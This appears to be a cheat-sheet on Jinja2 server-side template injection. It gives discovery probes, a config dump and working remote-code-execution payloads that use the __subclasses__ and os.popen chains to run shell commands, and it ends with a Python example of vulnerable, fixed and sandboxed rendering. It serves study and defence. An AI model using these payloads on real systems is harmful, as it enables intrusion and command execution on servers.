Discovery
The server will run Python in the back-end.
Jinja code example:
Input
<h1> Greetings, {{ userName }}</h1>
{% if qualities %}
Here are a couple of qualities that make you special:
<ul>
{% for q in qualities %}
<li>{{q}}</li>
{% endfor %}
</ul>
{% endif %}
Input
{{5*"5"}}
Output
55555
Input
{{ request }}
Output
<Request 'http://example.com/api/jinja' [POST]>
Exploitation
Access config variable
{{config|pprint}}
Remote Code Execution
Exploit the SSTI by calling subprocess.Popen
Note: the index 396 will vary depending on the application.
{{''.__class__.mro()[1].__subclasses__()}} # find the Popen Offset
{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
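The root cause behind the discovery probe and the payloads above, as an added example that is not part of the original page: the vulnerable handler splices user input into the template source, the corrected one passes it only as a context variable, and Jinja2's SandboxedEnvironment rejects the `__class__` attribute chain outright. Assumes jinja2 is installed; `render_vulnerable`, `render_safe`, `render_sandboxed` and the sample inputs are constructed here.

```python
from jinja2 import Environment
from jinja2.sandbox import SandboxedEnvironment, SecurityError

# The greeting template from the page; the source is a constant, not built from input.
GREETING = "<h1> Greetings, {{ userName }}</h1>"

# Constructed sample inputs: the discovery probe and the attribute chain shown above.
PROBE = '{{5*"5"}}'
CHAIN = "{{ ''.__class__.mro()[1].__subclasses__() }}"


def render_vulnerable(user_input: str) -> str:
    """SSTI: user input is concatenated into the template *source*, so any
    {{ ... }} it contains is parsed and evaluated by Jinja."""
    env = Environment(autoescape=True)
    return env.from_string("<h1> Greetings, " + user_input + "</h1>").render()


def render_safe(user_input: str) -> str:
    """Fix: the template source is fixed; user input only enters as a context
    value, which Jinja treats as data (and autoescapes), never as template code."""
    env = Environment(autoescape=True)
    return env.from_string(GREETING).render(userName=user_input)


def render_sandboxed(template_source: str, **context: object) -> str:
    """Defence in depth for the case where the template source itself must come
    from a user (e.g. customisable templates): SandboxedEnvironment treats
    attributes starting with '_' as unsafe, so the __class__ chain raises
    SecurityError instead of reaching __subclasses__()."""
    env = SandboxedEnvironment(autoescape=True)
    try:
        return env.from_string(template_source).render(**context)
    except SecurityError as exc:
        return "rejected: " + str(exc)


if __name__ == "__main__":
    print(render_vulnerable(PROBE))   # probe is evaluated: <h1> Greetings, 55555</h1>
    print(render_safe(PROBE))         # probe is rendered as literal (escaped) text
    print(render_sandboxed(GREETING, userName="Bob"))  # ordinary use still works
    print(render_sandboxed(CHAIN))    # starts with "rejected:"
```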